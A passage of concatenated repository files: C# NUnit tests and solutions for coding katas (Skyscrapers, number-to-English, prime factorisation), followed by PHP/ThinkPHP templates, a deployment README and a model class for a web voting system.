+ " " + String.Join(" ", Enumerable.Range(0, Size).Select(i => orderedClues.Pop())) + Environment.NewLine
+ Environment.NewLine + Skyscrapers.PrintValues()
+ Environment.NewLine + "Difference index: " + DifferenceIndex(expected, actual)
+ Environment.NewLine;
}
private static string DifferenceIndex(int[][] expected, int[][] actual)
{
for (int i = 0; i < Skyscrapers.Size; i++)
{
for (int j = 0; j < Size; j++)
{
if (expected[i][j] != actual[i][j]) return i + "," + j;
}
}
return String.Empty;
}
}
[TestFixture]
public class SkyscrapersTests6by6
{
[Test]
public void SolvePuzzle1()
{
var clues = new[]{ 3, 2, 2, 3, 2, 1,
1, 2, 3, 3, 2, 2,
5, 1, 2, 2, 4, 3,
3, 2, 1, 2, 2, 4};
var expected = new[]{new []{ 2, 1, 4, 3, 5, 6},
new []{ 1, 6, 3, 2, 4, 5},
new []{ 4, 3, 6, 5, 1, 2},
new []{ 6, 5, 2, 1, 3, 4},
new []{ 5, 4, 1, 6, 2, 3},
new []{ 3, 2, 5, 4, 6, 1 }};
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues);
CollectionAssert.AreEqual(expected, actual,
SkyscrapersTests4by4.ErrorMessage(expected, actual, orderedClues));
}
[Test]
public void SolvePuzzle2()
{
var clues = new[]{ 0, 0, 0, 2, 2, 0,
0, 0, 0, 6, 3, 0,
0, 4, 0, 0, 0, 0,
4, 4, 0, 3, 0, 0};
var expected = new[]{new []{ 5, 6, 1, 4, 3, 2 },
new []{ 4, 1, 3, 2, 6, 5 },
new []{ 2, 3, 6, 1, 5, 4 },
new []{ 6, 5, 4, 3, 2, 1 },
new []{ 1, 2, 5, 6, 4, 3 },
new []{ 3, 4, 2, 5, 1, 6 }};
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues);
CollectionAssert.AreEqual(expected, actual,
SkyscrapersTests4by4.ErrorMessage(expected, actual, orderedClues));
}
[Test]
public void SolvePuzzle3()
{
var clues = new[] { 0, 3, 0, 5, 3, 4,
0, 0, 0, 0, 0, 1,
0, 3, 0, 3, 2, 3,
3, 2, 0, 3, 1, 0};
var expected = new[]{new []{ 5, 2, 6, 1, 4, 3 },
new []{ 6, 4, 3, 2, 5, 1 },
new []{ 3, 1, 5, 4, 6, 2 },
new []{ 2, 6, 1, 5, 3, 4 },
new []{ 4, 3, 2, 6, 1, 5 },
new []{ 1, 5, 4, 3, 2, 6 }};
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues);
CollectionAssert.AreEqual(expected, actual,
SkyscrapersTests4by4.ErrorMessage(expected, actual, orderedClues));
}
[Test]
public void SolvePuzzle4()
{
var clues = new[] { 4,4,0,3,0,0,0,0,0,2,2,0,0,0,0,6,3,0,0,4,0,0,0,0};
var expected = new[]{
new []{ 3, 1, 6, 2, 4, 5 },
new []{ 4, 2, 5, 3, 1, 6 },
new []{ 2, 5, 4, 6, 3, 1 },
new []{ 5, 6, 3, 1, 2, 4 },
new []{ 1, 4, 2, 5, 6, 3 },
new []{ 6, 3, 1, 4, 5, 2 }
};
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues);
CollectionAssert.AreEqual(expected, actual,
SkyscrapersTests4by4.ErrorMessage(expected, actual, orderedClues));
}
}
[TestFixture]
public class SkyscrapersTests7by7
{
static int [][] clues = new[]
{
new [] { 7, 0, 0, 0, 2, 2, 3,
0, 0, 3, 0, 0, 0, 0,
3, 0, 3, 0, 0, 5, 0,
0, 0, 0, 0, 5, 0, 4 },
new [] { 0, 2, 3, 0, 2, 0, 0,
5, 0, 4, 5, 0, 4, 0,
0, 4, 2, 0, 0, 0, 6,
5, 2, 2, 2, 2, 4, 1 }
};
static int [][][] expected = new[]
{
new[] { new[] { 1, 5, 6, 7, 4, 3, 2 },
new[] { 2, 7, 4, 5, 3, 1, 6 },
new[] { 3, 4, 5, 6, 7, 2, 1 },
new[] { 4, 6, 3, 1, 2, 7, 5 },
new[] { 5, 3, 1, 2, 6, 4, 7 },
new[] { 6, 2, 7, 3, 1, 5, 4 },
new[] { 7, 1, 2, 4, 5, 6, 3 } },
new[] { new[] { 7, 6, 2, 1, 5, 4, 3 },
new[] { 1, 3, 5, 4, 2, 7, 6 },
new[] { 6, 5, 4, 7, 3, 2, 1 },
new[] { 5, 1, 7, 6, 4, 3, 2 },
new[] { 4, 2, 1, 3, 7, 6, 5 },
new[] { 3, 7, 6, 2, 1, 5, 4 },
new[] { 2, 4, 3, 5, 6, 1, 7 } }
};
[Test]
public void Test_1_Medium()
{
int index = 0;
int[] clues1 = clues[index];
int[][] expected1 = expected[index];
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues1[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues1);
CollectionAssert.AreEqual(expected1, actual,
SkyscrapersTests4by4.ErrorMessage(expected1, actual, orderedClues));
}
[Test]
public void Test_2_VeryHard()
{
int index = 1;
int[] clues1 = clues[index];
int[][] expected1 = expected[index];
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues1[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues1);
CollectionAssert.AreEqual(expected1, actual,
SkyscrapersTests4by4.ErrorMessage(expected1, actual, orderedClues));
}
[Test]
public void Test_3_VeryHard()
{
int index = 1;
int[] clues1 = {6,4,0,2,0,0,3,0,3,3,3,0,0,4,0,5,0,5,0,2,0,0,0,0,4,0,0,3};
int[][] expected1 = {
new[] { 2, 1, 6, 4, 3, 7, 5 },
new[] { 3, 2, 5, 7, 4, 6, 1 },
new[] { 4, 6, 7, 5, 1, 2, 3 },
new[] { 1, 3, 2, 6, 7, 5, 4 },
new[] { 5, 7, 1, 3, 2, 4, 6 },
new[] { 6, 4, 3, 2, 5, 1, 7 },
new[] { 7, 5, 4, 1, 6, 3, 2 } };
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues1[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues1);
CollectionAssert.AreEqual(expected1, actual,
SkyscrapersTests4by4.ErrorMessage(expected1, actual, orderedClues));
}
[Test]
public void Test_4_VeryHard()
{
int index = 1;
int[] clues1 = {0,0,0,5,0,0,3,0,6,3,4,0,0,0,3,0,0,0,2,4,0,2,6,2,2,2,0,0};
int[][] expected1 = {
new[] { 3, 5, 6, 1, 7, 2, 4 },
new[] { 7, 6, 5, 2, 4, 3, 1 },
new[] { 2, 7, 1, 3, 6, 4, 5 },
new[] { 4, 3, 7, 6, 1, 5, 2 },
new[] { 6, 4, 2, 5, 3, 1, 7 },
new[] { 1, 2, 3, 4, 5, 7, 6 },
new[] { 5, 1, 4, 7, 2, 6, 3 } };
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues1[t.Item1]).Reverse());
Skyscrapers.Expected = expected1;
var actual = Skyscrapers.SolvePuzzle(clues1);
CollectionAssert.AreEqual(expected1, actual,
SkyscrapersTests4by4.ErrorMessage(expected1, actual, orderedClues));
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/NumberToEnglish.cs
using System;
using NUnit.Framework;
namespace ConsoleApplication1
{
partial class Kata
{
public static string NumberToEnglish(int n)
{
if(n < 0 || n > 99999)
return string.Empty;
if (n == 0) return "zero";
if (n < 1000) return ProcessThreeDigits(n);
return ProcessTwoDigits(n/1000) + " thousand" + (n%1000 > 0 ? " " + ProcessThreeDigits(n%1000) : string.Empty);
}
private static string ProcessThreeDigits(int i)
{
if (i < 100 ) return ProcessTwoDigits(i);
return ProcessSingleDigit(i / 100) + " hundred" + ( i%100 > 0 ? " " + ProcessTwoDigits(i % 100) : string.Empty);
}
private static string ProcessTwoDigits(int i)
{
if (i < 10) return ProcessSingleDigit(i);
if(i < 20) return ProcessLessThan20(i);
return Process10Mulitiplier(i / 10) + (i%10 > 0 ? " " + ProcessSingleDigit(i%10) : string.Empty);
}
private static string Process10Mulitiplier(int i)
{
switch (i)
{
case 2:
return "twenty";
case 3:
return "thirty";
case 4:
return "forty";
case 5:
return "fifty";
case 6:
return "sixty";
case 7:
return "seventy";
case 8:
return "eighty";
case 9:
return "ninety";
default:
throw new InvalidOperationException("invalid input");
}
}
private static string ProcessLessThan20(int i)
{
i = i % 10;
switch (i)
{
case 0:
return "ten";
case 1:
return "eleven";
case 2:
return "twelve";
case 3:
return "thirteen";
case 4:
return "fourteen";
case 5:
return "fifteen";
case 6:
return "sixteen";
case 7:
return "seventeen";
case 8:
return "eighteen";
case 9:
return "nineteen";
default:
throw new InvalidOperationException("invalid input");
}
}
private static string ProcessSingleDigit(int i)
{
switch (i)
{
case 1:
return "one";
case 2:
return "two";
case 3:
return "three";
case 4:
return "four";
case 5:
return "five";
case 6:
return "six";
case 7:
return "seven";
case 8:
return "eight";
case 9:
return "nine";
default:
throw new InvalidOperationException("invalid input");
}
}
}
[TestFixture]
internal class Tests
{
[TestCase(-4, "")]
[TestCase(0, "zero")]
[TestCase(7, "seven")]
[TestCase(11, "eleven")]
[TestCase(20, "twenty")]
[TestCase(47, "forty seven")]
[TestCase(100, "one hundred")]
[TestCase(305, "three hundred five")]
[TestCase(4002, "four thousand two")]
[TestCase(20005, "twenty thousand five")]
[TestCase(6800, "six thousand eight hundred")]
[TestCase(14111, "fourteen thousand one hundred eleven")]
[TestCase(3892, "three thousand eight hundred ninety two")]
[TestCase(99999, "ninety nine thousand nine hundred ninety nine")]
public void BasicTest(int n, string expected)
{
Assert.That(Kata.NumberToEnglish(n), Is.EqualTo(expected));
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/PrimeDecomp.cs
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
class PrimeDecomp
{
public static string factors(int n)
{
List<Pair<int, int>> primeNumCount = new List<Pair<int, int>>();
primeNumCount.Add(new Pair<int, int>(2, 0));
DecompNum(n, primeNumCount);
return primeNumCount.Where(p => p.Count != 0).Select(p => "(" + p.PrimeNumber.ToString() + (p.Count > 1 ? "**" + p.Count : "") + ")")
.Aggregate((curr, next) => curr + next);
}
private static void DecompNum(int number, List<Pair<int, int>> primeNumCount)
{
foreach (Pair<int, int> pair in primeNumCount)
{
pair.Count += GetFactor(ref number, pair.PrimeNumber);
if(number == 1) return;
}
do
{
Pair<int, int> nextPrimeNumber = GetNextPrimeNumber(primeNumCount);
nextPrimeNumber.Count += GetFactor(ref number, nextPrimeNumber.PrimeNumber);
} while (number != 1);
}
private static Pair<int, int> GetNextPrimeNumber(List<Pair<int, int>> primeNumCount)
{
for(int current = primeNumCount.Last().PrimeNumber + 1;; current++)
{
bool isPrime = true;
foreach (Pair<int, int> pair in primeNumCount)
{
if (current % pair.PrimeNumber == 0)
{
isPrime = false;
break;
}
}
if (isPrime)
{
Pair<int, int> pair = new Pair<int, int>(current, 0);
primeNumCount.Add(pair);
return pair;
}
}
}
private static int GetFactor(ref int number, int primeNumber)
{
int count = 0;
do
{
if (number % primeNumber != 0) break;
count++;
number = number / primeNumber;
} while (true);
return count;
}
public class Pair<T, U> {
public Pair(T primeNumber, U count) {
PrimeNumber = primeNumber;
Count = count;
}
public T PrimeNumber { get; set; }
public U Count { get; set; }
}
}
[TestFixture]
public class PrimeDecompTests {
[Test]
public void Test1() {
int lst = 7775460;
Assert.AreEqual("(2**2)(3**3)(5)(7)(11**2)(17)", PrimeDecomp.factors(lst));
}
}
| d80a8aa7e1b51520f9ed10f121de60ed933989aa | [
"C#"
] | 20 | C# | gsach20/Kata | 4cada16378770d9df65608792f79a655fac49075 | 168424e1f3408a6f04764213c5818a0a51536ab5 |
refs/heads/master | <file_sep><?php
/**
* 添加投票
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/11
* Time: 15:56
*/
?>
<!doctype html>
<html class="no-js">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="viewport"
content="width=device-width, initial-scale=1">
<title>发起投票-投票系统</title>
<!-- Set render engine for 360 browser -->
<meta name="renderer" content="webkit">
<!-- No Baidu Siteapp-->
<meta http-equiv="Cache-Control" content="no-siteapp"/>
<link rel="icon" type="image/png" href="">
<!-- Add to homescreen for Chrome on Android -->
<meta name="mobile-web-app-capable" content="yes">
<link rel="icon" sizes="192x192" href="">
<!-- Add to homescreen for Safari on iOS -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="Amaze UI"/>
<link rel="apple-touch-icon-precomposed" href="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<!-- Tile icon for Win8 (144x144 + tile color) -->
<meta name="msapplication-TileImage" content="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<meta name="msapplication-TileColor" content="#0e90d2">
<link rel="stylesheet" href="http://cdn.amazeui.org/amazeui/2.7.2/css/amazeui.min.css">
</head>
<body>
{$header}
<!--交互信息提示-->
<div class="am-container">
</div>
<div class="am-g">
<div class="am-u-lg-3">
<span class="am-show-md-down"> </span>
<span class="am-show-lg-only"> </span>
</div>
<div class="am-u-lg-6">
<!-- 移动端适配 -->
<span class="am-show-md-down">
<form class="am-form">
<fieldset>
<legend>
<h2 class="am-titlebar-title" style="color: #0e90d2">
发起投票
</h2>
</legend>
<div class="am-form-group">
<label for="doc-ipt-email-1">投票标题</label>
<input type="text" class="voteTitle" placeholder="请输入标题">
</div>
<div class="am-form-group">
<label for="doc-ta-1">投票介绍</label>
<textarea class="voteIntro" rows="5" id="doc-ta-1"></textarea>
</div>
<div class="am-form-group">
<label for="doc-select-1">最低等级限制</label>
<select class="voteGrade" id="doc-select-1">
<option value="">请选择</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-ipt-email-1">每人最大投票数</label>
<input type="text" class="voteNumber" placeholder="请输入每人最大投票数">
</div>
<div class="am-form-group">
<label>截至日期</label>
<i class="am-icon-calendar"></i>
<input type="datetime-local" class="voteEndTime" placeholder="请输入截至日期">
</div>
<div class="am-form-group">
<label for="doc-select-1">是否匿名</label>
<select class="voteAno" id="doc-select-1">
<option value="">请选择</option>
<option value="1">是</option>
<option value="0">否</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-ta-1">选项</label><span>(图片或者描述必有一项)</span><br>
<div class="option"></div>
<div><a class="am-icon-btn am-icon-plus"></a><a class="am-icon-btn am-icon-minus"></a></div>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">验证码</label>
<div class="am-g">
<div class="am-u-sm-7"><input type="text" class="voteCaptcha" placeholder="请输入右侧四位验证码"></div>
<div class="am-u-sm-5"><img class="captchaImg" src="{:captcha_src()}" alt="captcha" />点击刷新</div>
</div>
</div>
<button type="button" class="am-btn am-btn-primary am-btn-block">发起投票</button>
</fieldset>
</form>
</span>
<!-- PC端适配 -->
<span class="am-show-lg-only">
<form class="am-form">
<fieldset>
<legend>
<h2 class="am-titlebar-title" style="color: #0e90d2">
发起投票
</h2>
</legend>
<div class="am-form-group">
<label for="doc-ipt-email-1">投票标题</label>
<input type="text" class="voteTitle" placeholder="请输入标题">
</div>
<div class="am-form-group">
<label for="doc-ta-1">投票介绍</label>
<textarea class="voteIntro" rows="5" id="doc-ta-1"></textarea>
</div>
<div class="am-form-group">
<label for="doc-select-1">最低等级限制</label>
<select class="voteGrade" id="doc-select-1">
<option value="">请选择</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-ipt-email-1">每人最大投票数</label>
<input type="text" class="voteNumber" placeholder="请输入每人最大投票数">
</div>
<div class="am-form-group">
<label>截至日期</label>
<i class="am-icon-calendar"></i>
<input type="datetime-local" class="voteEndTime" placeholder="请输入截至日期">
</div>
<div class="am-form-group">
<label for="doc-select-1">是否匿名</label>
<select class="voteAno" id="doc-select-1">
<option value="">请选择</option>
<option value="1">是</option>
<option value="0">否</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-ta-1">选项</label><span>(图片或者描述必有一项)</span><br>
<div class="option"></div>
<a class="am-icon-btn am-icon-plus"></a><a class="am-icon-btn am-icon-minus"></a>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">验证码</label>
<div class="am-g">
<div class="am-u-sm-7"><input type="text" class="voteCaptcha" placeholder="请输入右侧四位验证码"></div>
<div class="am-u-sm-5"><img class="captchaImg" src="{:captcha_src()}" alt="captcha" />点击刷新</div>
</div>
</div>
<button type="button" class="am-btn am-btn-primary am-btn-block">发起投票</button>
</fieldset>
</form>
</span>
</div>
<div class="am-u-lg-3">
<span class="am-show-md-down"> </span>
<span class="am-show-lg-only"> </span>
</div>
</div>
<div id="response">
</div>
{$footer}
<!--[if (gte IE 9)|!(IE)]><!-->
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
<!--<![endif]-->
<!--[if lte IE 8 ]>
<script src="http://libs.baidu.com/jquery/1.11.3/jquery.min.js"></script>
<script src="http://cdn.staticfile.org/modernizr/2.8.3/modernizr.js"></script>
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.ie8polyfill.min.js"></script>
<![endif]-->
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.min.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/addVote.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/header.js"></script>
<script>
var captchaUrl = "{:captcha_src()}";
var rootUrl = "{$Think.config.WEB_ROOT}";
var name = "{$user.name}";
var admin = "{$user.admin}";
var grade = "{$user.grade}";
</script>
</body>
</html>
<file_sep><?php
/**
* 结果界面
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/12
* Time: 23:30
*/
?>
<!doctype html>
<html class="no-js">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="viewport"
content="width=device-width, initial-scale=1">
<title>投票结果-投票系统</title>
<!-- Set render engine for 360 browser -->
<meta name="renderer" content="webkit">
<!-- No Baidu Siteapp-->
<meta http-equiv="Cache-Control" content="no-siteapp"/>
<link rel="icon" type="image/png" href="">
<!-- Add to homescreen for Chrome on Android -->
<meta name="mobile-web-app-capable" content="yes">
<link rel="icon" sizes="192x192" href="">
<!-- Add to homescreen for Safari on iOS -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="Amaze UI"/>
<link rel="apple-touch-icon-precomposed" href="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<!-- Tile icon for Win8 (144x144 + tile color) -->
<meta name="msapplication-TileImage" content="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<meta name="msapplication-TileColor" content="#0e90d2">
<link rel="stylesheet" href="http://cdn.amazeui.org/amazeui/2.7.2/css/amazeui.min.css">
</head>
<body>
{$header}
<span class="am-show-lg-only">
<div class="am-g">
<div class="am-u-sm-2"> </div>
<div class="am-u-sm-8">
<div class="am-container"> </div>
<section data-am-widget="accordion" class="am-accordion am-accordion-default">
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
标题
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
{$vote.title}
</div>
</dd>
</dl>
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
介绍
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
{$vote.introduction}
</div>
</dd>
</dl>
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
说明
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
<table class="am-table am-table-bordered">
<tbody>
<tr>
<td>发起人</td>
<td>{$vote.create_name}</td>
</tr>
<tr>
<td>开始时间</td>
<td>{$vote.create_time}</td>
</tr>
<tr class="am-danger">
<td>截止日期</td>
<td>{$vote.end_time}</td>
</tr>
<tr>
<td>是否匿名</td>
<td>
{if condition="($vote.anonymity == 1)"}是
{else \} 否
{/if}
</td>
</tr>
<tr>
<td>每人最多投票数</td>
<td>{$vote.vote_number}</td>
</tr>
</tbody>
</table>
</div>
</dd>
</dl>
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
投票结果
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
<div class="am-form-group">
<ul class="am-list am-list-static">
{volist name='optionList' id='option'}
<li>
<div class="am-g">
<div class="am-u-lg-1"> </div>
<div class="am-u-lg-9">
<div class="am-input-group">
{if condition="($option.content == 'null0_')"}
<span>
<img src="{$Think.config.WEB_ROOT}/public/uploads/{$option.img}" class="am-img-responsive" alt=""/>
{elseif condition="($option.img == 'null')" \}
<span> </span>
<span>
<blockquote>
<p>{$option.content}</p>
</blockquote>
{else /}
<span> </span>
<span>
<blockquote>
<p>{$option.content}</p>
</blockquote>
<img src="{$Think.config.WEB_ROOT}/public/uploads/{$option.img}" class="am-img-responsive" alt=""/>
{/if}
</span>
</div>
</div>
<div class="am-u-lg-2"> </div>
</div>
<div class="am-g">
<div class="am-u-lg-1"> </div>
<div class="am-u-lg-10">
<div class="am-progress">
<div class="am-progress-bar am-progress-bar-success" style="width: {$option.percent}%">{$option.percent}%</div>
</div>
{if condition="($vote['anonymity'] == 0)"}
<div class="am-panel am-panel-default am-panel-success">
<div class="am-panel-hd">投票人</div>
<div class="am-panel-bd">
{foreach $optionLog[$option['id']] as $vo}
{$vo} |
{/foreach}
</div>
</div>
{/if}
</div>
<div class="am-u-lg-1"> </div>
</div>
</li>
{/volist}
</ul>
</div>
</div>
</dd>
</dl>
</section>
</div>
<div class="am-u-sm-2"> </div>
</div>
</span>
<!--移动端-->
<span class="am-show-md-down">
<div class="am-g">
<div class="am-container"> </div>
<section data-am-widget="accordion" class="am-accordion am-accordion-default">
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
标题
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
{$vote.title}
</div>
</dd>
</dl>
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
介绍
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
{$vote.introduction}
</div>
</dd>
</dl>
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
说明
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
<table class="am-table am-table-bordered">
<tbody>
<tr>
<td>发起人</td>
<td>{$vote.create_name}</td>
</tr>
<tr>
<td>开始时间</td>
<td>{$vote.create_time}</td>
</tr>
<tr class="am-danger">
<td>截止日期</td>
<td>{$vote.end_time}</td>
</tr>
<tr>
<td>是否匿名</td>
<td>
{if condition="($vote.anonymity == 1)"}是
{else \} 否
{/if}
</td>
</tr>
<tr>
<td>每人最多投票数</td>
<td>{$vote.vote_number}</td>
</tr>
</tbody>
</table>
</div>
</dd>
</dl>
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
投票结果
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
<div class="am-form-group">
<ul class="am-list am-list-static">
{volist name='optionList' id='option'}
<li>
<div class="am-g">
<div class="am-u-lg-1"> </div>
<div class="am-u-lg-9">
<div class="am-input-group">
<span class="am-input-group-label">
<input class="option" type="checkbox" value="{$option.id}">
</span>
{if condition="($option.content == 'null0_')"}
<span>
<img src="{$Think.config.WEB_ROOT}/public/uploads/{$option.img}" class="am-img-responsive" alt=""/>
{elseif condition="($option.img == 'null')" \}
<span> </span>
<span>
<blockquote>
<p>{$option.content}</p>
</blockquote>
{else /}
<span> </span>
<span>
<blockquote>
<p>{$option.content}</p>
</blockquote>
<img src="{$Think.config.WEB_ROOT}/public/uploads/{$option.img}" class="am-img-responsive" alt=""/>
{/if}
</span>
</div>
</div>
<div class="am-u-lg-2"> </div>
</div>
<div class="am-g">
<div class="am-u-lg-1"> </div>
<div class="am-u-lg-10">
<div class="am-progress">
<div class="am-progress-bar am-progress-bar-success" style="width: {$option.percent}%">{$option.percent}%</div>
</div>
{if condition="($vote['anonymity'] == 0)"}
<div class="am-panel am-panel-default am-panel-success">
<div class="am-panel-hd">投票人</div>
<div class="am-panel-bd">
{foreach $optionLog[$option['id']] as $vo}
{$vo} |
{/foreach}
</div>
</div>
{/if}
</div>
<div class="am-u-lg-1"> </div>
</div>
</li>
{/volist}
</ul>
</div>
</div>
</dd>
</dl>
</section>
</div>
</span>
{$footer}
<!--[if (gte IE 9)|!(IE)]><!-->
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
<!--<![endif]-->
<!--[if lte IE 8 ]>
<script src="http://libs.baidu.com/jquery/1.11.3/jquery.min.js"></script>
<script src="http://cdn.staticfile.org/modernizr/2.8.3/modernizr.js"></script>
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.ie8polyfill.min.js"></script>
<![endif]-->
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.min.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/header.js"></script>
</body>
</html>
<file_sep>部署要求:
1.修改app目录下database.php中的MySQL用户名和密码以及端口
2.修改app目录下config.php中最后的WEB_ROOT配置,地址为public目录的上一级目录且不带最后一个反斜杠(/)
3.入口文件为public目录下的index.php
4.vote_system.sql为数据库文件,里面默认含有一个等级为4的管理员用户admin,登陆密码为<PASSWORD>,用该用户登录可以添加用户。
5.如果部署到Linux服务器,请修改runtime文件夹和public文件夹下的uploads文件夹(如果没有可手动创建)的权限,使其拥有写入权限。
环境要求:
PHP7.0以上+MySQL+Apache
<file_sep><?php
/**
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/11
* Time: 20:26
*/
namespace app\index\model;
use think\Model;
class Option extends Model {
/**
* 添加选项
* @param array $options
*/
public function addOption(array $options) {
$this->saveAll($options);
}
public function getAllOptionById(int $id) : array {
$where = array(
"vote_id" => $id,
);
$result = $this->where($where)->select();
$newResult = [];
//总的票数
$totalNumber = 0;
if (count($result) > 0) {
foreach ($result as $value) {
$newResult[] = $value->data;
$totalNumber += $value->data['number'];
}
foreach ($newResult as $key => $value) {
if ($totalNumber == 0) {
$newResult[$key]['percent'] = 0;
} else {
$newResult[$key]['percent'] = round($newResult[$key]['number'] * 100 / $totalNumber, 1);
}
}
}
return $newResult;
}
/**
* 根据投票id获取所有的选项id
* @param int $voteId
* @return array
*/
public function getAllOptionIdByVoteId(int $voteId) : array {
$where = array(
"vote_id" => $voteId,
);
$result = $this->where($where)->column('id');
return $result;
}
/**
* 未选择的选项number+1
* @param $postVoting
*/
public function addNumber($postVoting) {
foreach ($postVoting as $item) {
$option = $this->getOneOptionById($item);
$number = $option['number'] + 1;
unset($option['number']);
